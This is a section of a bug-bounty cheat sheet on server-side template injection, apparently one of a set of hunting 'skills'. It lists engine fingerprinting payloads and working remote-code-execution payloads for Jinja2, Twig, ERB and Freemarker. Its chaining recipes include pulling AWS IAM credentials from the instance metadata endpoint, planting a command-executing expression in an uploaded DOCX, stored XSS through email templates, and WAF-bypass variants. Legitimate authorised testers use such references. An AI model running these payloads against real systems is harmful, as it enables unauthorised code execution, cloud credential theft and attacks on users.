14. SSTI — SERVER-SIDE TEMPLATE INJECTION
Easy to detect, high payout ($2K–$8K). Direct path to RCE.
Detection Payloads (try all)
{{7*7}} → 49 = Jinja2 / Twig
${7*7} → 49 = Freemarker / Velocity
<%= 7*7 %> → 49 = ERB (Ruby)
#{7*7} → 49 = Mako
*{7*7} → 49 = Spring Thymeleaf
{{7*'7'}} → 7777777 = Jinja2 (not Twig)
RCE Payloads
Jinja2 (Python/Flask):
{{config.__class__.__init__.__globals__['os'].popen('id').read()}}
Twig (PHP/Symfony):
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
ERB (Ruby):
<%= `id` %>
Where to Test
Name/bio/description fields, email templates, invoice name, PDF generators,
URL path parameters, search queries reflected in results, HTTP headers reflected
Related Skills & Chains
hunt-rce— SSTI is the easiest path to RCE on Python/Ruby/PHP/Java stacks because the template language already exposes the runtime. Chain primitive: Jinja2{{config.__class__.__init__.__globals__['os'].popen('id').read()}}or Freemarker<#assign x="freemarker.template.utility.Execute"?new()>${x("id")}→ unauthenticated RCE as the rendering worker. Always escalate fingerprint → class-walker → cmd exec.hunt-xss— When the template engine sandboxes the runtime (or you only get the rendered output back as HTML), the same{{7*7}}reflection often still yields stored XSS. Chain primitive: sandboxed Jinja2 SSTI without escapes → inject<script>into rendered email template → stored XSS hitting every recipient who views the message.hunt-ssrf— Template engines often expose URL fetchers/filters before they expose the runtime, giving you SSRF before RCE. Chain primitive: Twig{{ include('http://169.254.169.254/latest/meta-data/iam/security-credentials/') }}or Jinja2 withurl_for/custom filters → AWS metadata exfil → cloud creds.hunt-file-upload— Office docs, SVGs, and email templates uploaded by the user are common SSTI surfaces (the server re-renders them). Chain primitive: upload a DOCX whoseword/document.xmlcontains${T(java.lang.Runtime).getRuntime().exec("id")}to a Velocity/Freemarker-driven mail-merge → RCE.security-arsenal— Reach for the engine-specific escape payload tree: Jinja2 class-walker variants (__subclasses__()[N]index hunting), Twig_self.envregisterUndefinedFilterCallback, Freemarker?new()Execute, ERB backticks, Velocity$class.inspect, Smarty{php}...{/php}, plus the WAF-bypass variants ({{request|attr('application')|...}}, Unicode escapes,{%print(...)%}).triage-validation— Apply the Pre-Severity Gate before claiming Critical RCE. A{{7*7}} → 49reflection inside a sandboxed engine (e.g., Twig sandbox mode, Jinja2 SandboxedEnvironment with no escape) is Medium SSTI, not Critical RCE. Proveid/OOB DNS callback with a unique marker before writing the report.